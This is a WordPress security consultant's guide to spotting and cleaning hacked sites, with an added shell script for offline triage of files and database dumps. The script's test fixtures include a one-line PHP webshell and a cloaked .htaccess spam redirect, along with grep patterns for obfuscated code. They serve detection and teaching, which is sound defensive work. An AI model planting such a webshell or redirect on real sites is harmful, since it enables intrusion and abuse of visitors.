I’ve Fixed 4500+ Hacked Sites — Here’s What Most Website Owners Miss
After cleaning thousands of hacked WordPress websites, I can tell you one thing clearly: most site owners notice the problem too late. Not because the hack was invisible forever, but because the warning signs looked small at first. A slight traffic drop. A weird redirect. A spam page in Google. An unknown user account. By the time the problem becomes obvious, the malware has often already damaged rankings, trust, and revenue.
If you think your WordPress site may be hacked, this guide will help you spot the real warning signs, understand how these infections usually happen, and follow a safer cleanup process without making the situation worse.
If you need urgent help, start with my free WordPress malware scan or see my WordPress malware removal service.
Quick answer
A hacked WordPress site usually shows one or more of these signs: unexpected redirects, spam pages in Google, new admin users, modified files, browser security warnings, slow performance, or strange code in the database or plugin folders.
The safest recovery path is to confirm the infection, preserve a backup, inspect both files and database, remove the malicious code and persistence mechanisms, patch the original weakness, rotate passwords, and then deal with blacklist or SEO fallout.
Signs your WordPress site may be hacked
Not every hacked site gets a dramatic homepage defacement. In many cases, hackers want the site to look normal to the owner while it quietly serves spam, redirects, phishing pages, or malicious scripts behind the scenes.
- Sudden drop in traffic or rankings: Google may flag hacked content or stop trusting the site.
- Unexpected redirects: visitors land on casino, pharma, scam, or fake-login pages.
- Spam pages or weird URLs in Google: especially Japanese keyword spam, pharma spam, or gibberish URLs.
- Unknown admin users or plugin changes: a common sign of persistence after compromise.
- Unusual slowness or CPU spikes: malware can abuse server resources or send spam.
- Browser or Search Console warnings: “This site may be hacked,” phishing warnings, or security issue alerts.
- Modified core files or suspicious code: especially in wp-config.php, theme files, uploads, or mu-plugins.
If you are not yet sure whether the site is actually infected, read my full guide on how to detect WordPress malware before changing anything.
Why WordPress sites get hacked in the first place
WordPress itself is not usually the weakest point. Most compromises happen through the ecosystem around it: outdated plugins, vulnerable themes, stolen credentials, weak hosting hygiene, or risky software choices.
| Common cause | Why it matters | Typical outcome |
|---|---|---|
| Outdated plugins or themes | Known vulnerabilities remain exposed | Malware upload, backdoor access, spam injection |
| Weak or reused passwords | Brute-force or credential stuffing becomes easier | Admin takeover |
| Nulled or pirated software | Often ships with hidden backdoors | Persistent reinfection |
| Unhardened admin access | No 2FA, poor role control, exposed login paths | Unauthorized logins and user abuse |
| Insecure hosting or poor isolation | One infected account can affect others | Cross-account compromise or recurring malware |
| Bad file permissions or unsafe edits | Attackers get easier write access | Core or theme file injection |
What website owners often miss
Most failed cleanups happen because the visible symptom gets removed, but the real persistence mechanism stays behind.
- They clean the homepage but not the whole server: malware often hides in uploads, fake plugins, cache paths, or mu-plugins.
- They skip the database: injected options, hidden users, cron events, and payloads can survive file cleanup.
- They restore a dirty backup: the infection comes right back.
- They forget SEO cleanup: spam URLs, hacked snippets, and blacklist warnings can remain after the malware is removed.
- They never patch the entry point: the same vulnerability stays open.
If you suspect the infection is hiding deeper than the files alone, read my guide on cleaning hidden malware from the WordPress database. If you see login anomalies or permission weirdness, this guide on hidden admin users in WordPress is also relevant.
How to remove WordPress malware safely
1. Preserve evidence and make an isolated backup
Before deleting anything, create a full backup of files and database and store it outside the server. This is not a backup to restore immediately. It is your forensic snapshot in case you need to review what changed, compare timestamps, or recover legitimate data.
2. Contact your host if the site is actively harmful or suspended
If visitors are being redirected, phishing pages are live, or your host has suspended the account, contact the hosting provider early. On shared hosting especially, they may see server-side abuse or neighboring-account issues you cannot see from WordPress alone.
3. Run both external and internal checks
Use an external scanner to catch obvious blacklist or homepage issues, then run a server-side scan inside WordPress to look for modified files and suspicious code. Online scanners are useful, but they cannot see every hidden file or database payload.
4. Inspect the highest-risk locations manually
Do not rely only on green checkmarks. Review these areas manually:
- wp-config.php
- active theme files, especially functions.php
- wp-content/plugins/
- wp-content/mu-plugins/
- wp-content/uploads/ for unexpected PHP files
- .htaccess and redirect rules
If your site keeps getting reinfected after you think it is clean, read why WordPress malware keeps coming back. That is usually a persistence problem, not bad luck.
5. Audit the database, users, and scheduled actions
Check for rogue admin accounts, suspicious options, injected JavaScript, cron-based reinfection, and strange content in key tables. A file-only cleanup is often incomplete.
6. Remove infected files and replace anything untrusted
Delete fake plugins, remove malicious code, and replace modified core, theme, or plugin files with clean copies from trusted sources. If you cannot verify a file confidently, do not assume it is safe just because the site still loads.
7. Patch the entry point
Cleaning the malware is not enough. You also need to close the hole that let the attacker in. That may mean updating or removing a vulnerable plugin, changing access controls, fixing file permissions, or removing abandoned software entirely.
8. Rotate passwords and invalidate old sessions
Change WordPress passwords, hosting credentials, SFTP/FTP passwords, database passwords, and the authentication keys and salts in wp-config.php. Changing the salts invalidates every existing login cookie, so an attacker who still holds a session is logged out. If the attacker had any kind of authenticated access, this step matters.
9. Handle blacklist and SEO fallout
After technical cleanup, check Google Search Console for security issues, hacked content warnings, and indexed spam URLs. If the site was flagged publicly, cleanup is only part of the recovery. You may also need review requests, temporary removals, or a plan for deindexing spam URLs.
If that is your situation, my Google blacklist removal service and this case study on removing 10,500 spam URLs from Google will be useful next reads.
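The technical steps above (forensic snapshot, file inspection, database audit) as one runnable shell example. This is added here and is not code from this site or from any scanner it mentions. It assumes a standard wp-content layout, that you run it on a copy of the files plus the mysqldump from step 1 on an analysis machine rather than the live install, and that the mysqldump uses its default single-line INSERT format. Every fixture file and dump row it creates is constructed for the demo, and all function names are mine.

```shell
#!/bin/sh
# Added example (not the author's code): offline triage for the technical
# steps above. Run it on a copy of the site plus the mysqldump from step 1,
# never on the live install. Fixtures and dump rows below are constructed.

# Step 1: forensic file snapshot ($1 = document root, $2 = evidence dir).
# Dump the database beside it with: mysqldump --single-transaction DB > db.sql
snapshot_files() {
    mkdir -p "$2"
    tar -czf "$2/files-$(date +%Y%m%d-%H%M%S).tgz" -C "$1" .
}

# Step 4: any PHP under uploads/ is almost always a dropped webshell.
php_in_uploads() {
    find "$1/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null
}

# Obfuscation idioms typical of injected PHP. A few legitimate plugins also
# decode base64, so treat each hit as a file to read, not a verdict.
SUSPICIOUS='(eval|base64_decode|gzinflate|str_rot13|create_function)[[:space:]]*\('
suspicious_php() {
    grep -rlE --include='*.php' "$SUSPICIOUS" "$1" 2>/dev/null
}

# .htaccess rules sending visitors to another host (behind a RewriteCond on
# User-Agent or Referer this is the classic cloaked search-spam redirect).
htaccess_redirects() {
    grep -nE '^[[:space:]]*(RewriteRule|Redirect(Match)?)[[:space:]].*https?://' "$1/.htaccess" 2>/dev/null
}

# mu-plugins load on every request and never show as "active" in the dashboard.
list_mu_plugins() {
    find "$1/wp-content/mu-plugins" -maxdepth 1 -name '*.php' 2>/dev/null
}

# World-writable files can be rewritten by any process on a shared host.
world_writable() {
    find "$1" -type f -perm -002 2>/dev/null
}

# Step 5, against the dump: user IDs whose wp_capabilities grant the
# administrator role, resolved to the login stored in wp_users.
dump_admin_users() {
    grep -oE "\([0-9]+,[0-9]+,'wp_capabilities','[^']*administrator[^']*'\)" "$1" \
    | cut -d, -f2 | while read -r id; do
        login=$(grep -E '^INSERT INTO `wp_users`' "$1" | grep -oE "\($id,'[^']+'" \
                | head -n1 | sed -E "s/^\($id,'([^']+)'/\1/")
        printf '%s %s\n' "$id" "$login"
    done
}

# Hook names scheduled in the serialized cron option. Compare them with the
# hooks your core version and installed plugins register; the rest are leads.
dump_cron_hooks() {
    grep -E "'cron'," "$1" \
    | grep -oE 's:[0-9]+:\\"[A-Za-z0-9_]+\\";a:[0-9]+:[{]s:32:\\"' \
    | sed -E 's/^s:[0-9]+:\\"([A-Za-z0-9_]+)\\".*/\1/' | sort -u
}

# External script/iframe sources stored in posts or options (legitimate
# embeds such as video players also appear here; check each host).
dump_injected_scripts() {
    grep -oiE '<(script|iframe)[^>]*src=\\"[^\\"]+' "$1" | sort -u
}

# Constructed fixtures: a small infected tree and an abbreviated mysqldump.
make_sample_site() {
    mkdir -p "$1/wp-content/uploads/2024/06" "$1/wp-content/mu-plugins" "$1/wp-content/plugins/akismet"
    printf '<?php echo "ok";\n' > "$1/wp-content/plugins/akismet/akismet.php"
    printf '<?php eval(base64_decode($_POST["c"]));\n' > "$1/wp-content/uploads/2024/06/wp-cache.php"
    printf '<?php add_action("init", function () { echo "hidden"; });\n' > "$1/wp-content/mu-plugins/loader.php"
    printf 'RewriteEngine On\nRewriteCond %%{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\nRewriteRule ^(.*)$ https://pharma.example.net/$1 [R=301,L]\n' > "$1/.htaccess"
    printf '<?php define("DB_NAME", "wp");\n' > "$1/wp-config.php"
    chmod 666 "$1/wp-config.php"
}
make_sample_dump() {
    cat > "$1" <<'EOF'
INSERT INTO `wp_users` VALUES (1,'admin','$P$Bx','admin','admin@example.com','','2024-01-01 00:00:00','',0,'admin'),(7,'wp_support','$P$By','wp_support','x@example.net','','2024-06-02 03:14:00','',0,'wp_support');
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','admin'),(2,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(3,7,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}');
INSERT INTO `wp_options` VALUES (110,'cron','a:2:{i:1700000000;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1700001000;a:1:{s:12:\"wp_sync_task\";a:1:{s:32:\"d41d8cd98f00b204e9800998ecf8427e\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}}','auto');
INSERT INTO `wp_posts` VALUES (5,1,'2024-06-02 03:15:00','Welcome<script src=\"https://cdn.example.net/r.js\"></script>','Hello');
EOF
}

# Full report: $1 = document root, $2 = dump file.
triage_report() {
    for fn in php_in_uploads suspicious_php htaccess_redirects list_mu_plugins world_writable; do
        printf '== %s ==\n' "$fn"; "$fn" "$1"
    done
    for fn in dump_admin_users dump_cron_hooks dump_injected_scripts; do
        printf '== %s ==\n' "$fn"; "$fn" "$2"
    done
}

demo=$(mktemp -d)   # demo on the fixtures; point it at your copied site and real dump instead
make_sample_site "$demo/site"; make_sample_dump "$demo/db.sql"
triage_report "$demo/site" "$demo/db.sql"
rm -rf "$demo"
```

On the fixtures the report lists the webshell in uploads, the cloaked RewriteRule, the hidden mu-plugin, the world-writable wp-config.php, two administrator accounts (one of which, wp_support, nobody created on purpose), a cron hook named wp_sync_task that no core or common plugin registers, and an external script injected into a post. Each line is a lead to verify by hand, which is the point of step 4 and step 5: the script finds candidates, you decide. If WP-CLI is available on a live copy, `wp user list --role=administrator`, `wp cron event list` and `wp core verify-checksums` give the same answers from inside WordPress, but the dump-based functions work even when the site is suspended or you do not trust the running PHP.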
Can you clean a hacked WordPress site yourself?
Sometimes, yes. If the infection is simple, the entry point is obvious, and you know how to compare files, inspect the database, and verify the cleanup, a careful DIY recovery is possible.
But if the site is a business-critical asset, the infection keeps returning, Search Console is showing security warnings, or you are not sure what is malicious, DIY can become more expensive than expert cleanup. A partial fix often leads to reinfection, more SEO damage, or a failed review request.
How to prevent future hacks
- Keep WordPress core, plugins, and themes updated.
- Remove unused plugins, themes, and abandoned software.
- Use strong unique passwords and enable 2FA for admins.
- Use reputable hosting and keep backups outside the live server.
- Limit admin access and review user roles regularly.
- Monitor file changes, login activity, and Search Console alerts.
- Avoid nulled themes and plugins completely.
- Use HTTPS, sane file permissions, and a firewall or edge protection where appropriate.
These basics are not glamorous, but they prevent a large share of the compromises I see in real cleanup work.
When to hire a professional
You should bring in expert help if:
- the infection keeps coming back,
- you see spam pages or hacked URLs in Google,
- the site has unknown admin users or fake plugins,
- your host suspended the account,
- the site is redirecting visitors or showing phishing content,
- you already tried cleaning it and do not trust the result.
If that sounds familiar, you can hire me directly or browse more real-world malware cleanup case studies first.
Final thoughts
A hacked WordPress site is not just a technical problem. It is usually a business, trust, and SEO problem too. The sooner you identify the real infection path and remove it properly, the better your chances of avoiding reinfection and long-term ranking damage.
If your WordPress site is hacked, do not stop at the first suspicious file. Check the files, database, users, cron activity, SEO damage, and the original entry point. That is how you fix the problem instead of just hiding the symptom.
Need help now? Start with my free scan, review my background and experience, or hire me directly.
FAQ
How do I know if my WordPress site is hacked?
Common signs include redirects, spam pages in Google, security warnings, unknown users, modified files, unusual slowdowns, or strange code in your database or plugin folders.
What is the most common cause of WordPress hacks?
In real-world cases, outdated plugins and themes, weak passwords, vulnerable hosting environments, and nulled software are among the most common causes.
Can I just restore a backup?
Only if you are sure the backup is clean and the original entry point has been fixed. Restoring an infected backup reinstalls the malware, and restoring a clean pre-compromise backup without patching the weakness leaves the same door open for the attacker to walk back through.
Why does WordPress malware keep coming back?
Usually because a persistence mechanism was missed, such as a hidden plugin, rogue admin user, cron job, database payload, or the original vulnerability itself.
How do I remove hacked URLs from Google?
First clean the site completely. Then review Search Console security issues, use temporary removals when appropriate, and make sure the hacked URLs are actually gone, returning a 404 or 410 rather than a cloaked 200, before expecting them to drop out of search.